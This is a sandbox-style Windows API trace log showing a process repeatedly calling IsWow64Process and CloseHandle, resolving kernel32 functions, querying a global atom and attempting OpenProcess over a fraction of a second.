	[0124.357] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.357] CloseHandle (hObject=0x69c) returned 1
	[0124.357] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.357] CloseHandle (hObject=0x69c) returned 1
	[0124.357] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.357] CloseHandle (hObject=0x69c) returned 1
	[0124.357] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.357] CloseHandle (hObject=0x69c) returned 1
	[0124.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.358] CloseHandle (hObject=0x69c) returned 1
	[0124.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.358] CloseHandle (hObject=0x69c) returned 1
	[0124.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.358] CloseHandle (hObject=0x69c) returned 1
	[0124.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.358] CloseHandle (hObject=0x69c) returned 1
	[0124.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.358] CloseHandle (hObject=0x69c) returned 1
	[0124.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.359] CloseHandle (hObject=0x69c) returned 1
	[0124.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.359] CloseHandle (hObject=0x69c) returned 1
	[0124.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.359] CloseHandle (hObject=0x69c) returned 1
	[0124.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.359] CloseHandle (hObject=0x69c) returned 1
	[0124.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.359] CloseHandle (hObject=0x69c) returned 1
	[0124.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.360] CloseHandle (hObject=0x69c) returned 1
	[0124.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.360] CloseHandle (hObject=0x69c) returned 1
	[0124.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.360] CloseHandle (hObject=0x69c) returned 1
	[0124.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.360] CloseHandle (hObject=0x69c) returned 1
	[0124.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.361] CloseHandle (hObject=0x69c) returned 1
	[0124.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.361] CloseHandle (hObject=0x69c) returned 1
	[0124.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.361] CloseHandle (hObject=0x69c) returned 1
	[0124.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.361] CloseHandle (hObject=0x69c) returned 1
	[0124.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.361] CloseHandle (hObject=0x69c) returned 1
	[0124.362] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.362] CloseHandle (hObject=0x69c) returned 1
	[0124.362] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.362] CloseHandle (hObject=0x69c) returned 1
	[0124.362] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.362] CloseHandle (hObject=0x69c) returned 1
	[0124.362] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.363] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.363] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.363] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.363] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.363] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.363] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.364] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.364] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.364] CloseHandle (hObject=0x69c) returned 1
	[0124.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.364] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.364] CloseHandle (hObject=0x69c) returned 1
	[0124.365] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.365] CloseHandle (hObject=0x69c) returned 1
	[0124.365] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.365] CloseHandle (hObject=0x69c) returned 1
	[0124.365] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.365] CloseHandle (hObject=0x69c) returned 1
	[0124.365] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.365] CloseHandle (hObject=0x69c) returned 1
	[0124.401] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.401] CloseHandle (hObject=0x69c) returned 1
	[0124.401] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.401] CloseHandle (hObject=0x69c) returned 1
	[0124.401] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.401] CloseHandle (hObject=0x69c) returned 1
	[0124.401] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.401] CloseHandle (hObject=0x69c) returned 1
	[0124.402] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.402] CloseHandle (hObject=0x69c) returned 1
	[0124.402] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.402] CloseHandle (hObject=0x69c) returned 1
	[0124.402] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.402] CloseHandle (hObject=0x69c) returned 1
	[0124.402] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.402] CloseHandle (hObject=0x69c) returned 1
	[0124.402] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.403] CloseHandle (hObject=0x69c) returned 1
	[0124.403] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.403] CloseHandle (hObject=0x69c) returned 1
	[0124.403] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.403] CloseHandle (hObject=0x69c) returned 1
	[0124.403] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.403] CloseHandle (hObject=0x69c) returned 1
	[0124.403] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.403] CloseHandle (hObject=0x69c) returned 1
	[0124.404] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.404] CloseHandle (hObject=0x69c) returned 1
	[0124.404] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.404] CloseHandle (hObject=0x69c) returned 1
	[0124.404] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.404] CloseHandle (hObject=0x69c) returned 1
	[0124.404] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.404] CloseHandle (hObject=0x69c) returned 1
	[0124.404] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.405] CloseHandle (hObject=0x69c) returned 1
	[0124.405] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.405] CloseHandle (hObject=0x69c) returned 1
	[0124.405] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.405] CloseHandle (hObject=0x69c) returned 1
	[0124.405] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.405] CloseHandle (hObject=0x69c) returned 1
	[0124.405] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.405] CloseHandle (hObject=0x69c) returned 1
	[0124.406] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.406] CloseHandle (hObject=0x69c) returned 1
	[0124.406] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.406] CloseHandle (hObject=0x69c) returned 1
	[0124.406] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.406] CloseHandle (hObject=0x69c) returned 1
	[0124.406] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.406] CloseHandle (hObject=0x69c) returned 1
	[0124.406] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.406] CloseHandle (hObject=0x69c) returned 1
	[0124.407] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.407] CloseHandle (hObject=0x69c) returned 1
	[0124.407] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.407] CloseHandle (hObject=0x69c) returned 1
	[0124.407] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.407] CloseHandle (hObject=0x69c) returned 1
	[0124.407] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.408] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.408] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.408] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.408] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.408] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.408] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.409] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.409] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.409] CloseHandle (hObject=0x69c) returned 1
	[0124.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.409] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.409] CloseHandle (hObject=0x69c) returned 1
	[0124.410] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.410] CloseHandle (hObject=0x69c) returned 1
	[0124.410] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.410] CloseHandle (hObject=0x69c) returned 1
	[0124.410] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.410] CloseHandle (hObject=0x69c) returned 1
	[0124.410] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.410] CloseHandle (hObject=0x69c) returned 1
	[0124.443] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.443] CloseHandle (hObject=0x69c) returned 1
	[0124.443] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.443] CloseHandle (hObject=0x69c) returned 1
	[0124.443] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.443] CloseHandle (hObject=0x69c) returned 1
	[0124.443] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.443] CloseHandle (hObject=0x69c) returned 1
	[0124.444] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.444] CloseHandle (hObject=0x69c) returned 1
	[0124.444] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.444] CloseHandle (hObject=0x69c) returned 1
	[0124.444] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.444] CloseHandle (hObject=0x69c) returned 1
	[0124.444] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.444] CloseHandle (hObject=0x69c) returned 1
	[0124.444] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.444] CloseHandle (hObject=0x69c) returned 1
	[0124.445] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.445] CloseHandle (hObject=0x69c) returned 1
	[0124.445] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.445] CloseHandle (hObject=0x69c) returned 1
	[0124.445] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.445] CloseHandle (hObject=0x69c) returned 1
	[0124.445] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.445] CloseHandle (hObject=0x69c) returned 1
	[0124.445] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.445] CloseHandle (hObject=0x69c) returned 1
	[0124.446] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.446] CloseHandle (hObject=0x69c) returned 1
	[0124.446] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.446] CloseHandle (hObject=0x69c) returned 1
	[0124.446] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.446] CloseHandle (hObject=0x69c) returned 1
	[0124.446] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.446] CloseHandle (hObject=0x69c) returned 1
	[0124.446] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.446] CloseHandle (hObject=0x69c) returned 1
	[0124.447] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.447] CloseHandle (hObject=0x69c) returned 1
	[0124.447] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.447] CloseHandle (hObject=0x69c) returned 1
	[0124.447] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.447] CloseHandle (hObject=0x69c) returned 1
	[0124.447] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.447] CloseHandle (hObject=0x69c) returned 1
	[0124.447] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.448] CloseHandle (hObject=0x69c) returned 1
	[0124.448] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.448] CloseHandle (hObject=0x69c) returned 1
	[0124.448] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.448] CloseHandle (hObject=0x69c) returned 1
	[0124.448] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.448] CloseHandle (hObject=0x69c) returned 1
	[0124.448] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.448] CloseHandle (hObject=0x69c) returned 1
	[0124.449] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.449] CloseHandle (hObject=0x69c) returned 1
	[0124.449] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.449] CloseHandle (hObject=0x69c) returned 1
	[0124.449] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.450] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.450] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.450] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.450] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.451] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.451] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.451] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.451] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.451] CloseHandle (hObject=0x69c) returned 1
	[0124.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.451] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.451] CloseHandle (hObject=0x69c) returned 1
	[0124.452] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.452] CloseHandle (hObject=0x69c) returned 1
	[0124.452] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.452] CloseHandle (hObject=0x69c) returned 1
	[0124.452] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.452] CloseHandle (hObject=0x69c) returned 1
	[0124.452] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.452] CloseHandle (hObject=0x69c) returned 1
	[0124.489] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.489] CloseHandle (hObject=0x69c) returned 1
	[0124.489] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.489] CloseHandle (hObject=0x69c) returned 1
	[0124.489] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.489] CloseHandle (hObject=0x69c) returned 1
	[0124.489] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.490] CloseHandle (hObject=0x69c) returned 1
	[0124.490] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.490] CloseHandle (hObject=0x69c) returned 1
	[0124.490] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.490] CloseHandle (hObject=0x69c) returned 1
	[0124.491] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.491] CloseHandle (hObject=0x69c) returned 1
	[0124.491] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.491] CloseHandle (hObject=0x69c) returned 1
	[0124.491] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.491] CloseHandle (hObject=0x69c) returned 1
	[0124.491] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.491] CloseHandle (hObject=0x69c) returned 1
	[0124.491] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.491] CloseHandle (hObject=0x69c) returned 1
	[0124.492] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.492] CloseHandle (hObject=0x69c) returned 1
	[0124.492] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.492] CloseHandle (hObject=0x69c) returned 1
	[0124.492] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.492] CloseHandle (hObject=0x69c) returned 1
	[0124.492] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.492] CloseHandle (hObject=0x69c) returned 1
	[0124.493] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.493] CloseHandle (hObject=0x69c) returned 1
	[0124.493] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.493] CloseHandle (hObject=0x69c) returned 1
	[0124.493] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.493] CloseHandle (hObject=0x69c) returned 1
	[0124.493] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.493] CloseHandle (hObject=0x69c) returned 1
	[0124.493] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.494] CloseHandle (hObject=0x69c) returned 1
	[0124.494] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.494] CloseHandle (hObject=0x69c) returned 1
	[0124.494] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.494] CloseHandle (hObject=0x69c) returned 1
	[0124.494] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.494] CloseHandle (hObject=0x69c) returned 1
	[0124.494] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.494] CloseHandle (hObject=0x69c) returned 1
	[0124.495] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.495] CloseHandle (hObject=0x69c) returned 1
	[0124.495] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.495] CloseHandle (hObject=0x69c) returned 1
	[0124.495] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.495] CloseHandle (hObject=0x69c) returned 1
	[0124.495] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.495] CloseHandle (hObject=0x69c) returned 1
	[0124.495] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.496] CloseHandle (hObject=0x69c) returned 1
	[0124.496] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.496] CloseHandle (hObject=0x69c) returned 1
	[0124.496] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.496] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.496] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.497] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.497] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.497] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.497] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.497] CloseHandle (hObject=0x69c) returned 1
	[0124.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.498] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.498] CloseHandle (hObject=0x69c) returned 1
	[0124.498] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.498] CloseHandle (hObject=0x69c) returned 1
	[0124.498] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.498] CloseHandle (hObject=0x69c) returned 1
	[0124.498] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.498] CloseHandle (hObject=0x69c) returned 1
	[0124.498] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.498] CloseHandle (hObject=0x69c) returned 1
	[0124.533] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.533] CloseHandle (hObject=0x69c) returned 1
	[0124.533] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.533] CloseHandle (hObject=0x69c) returned 1
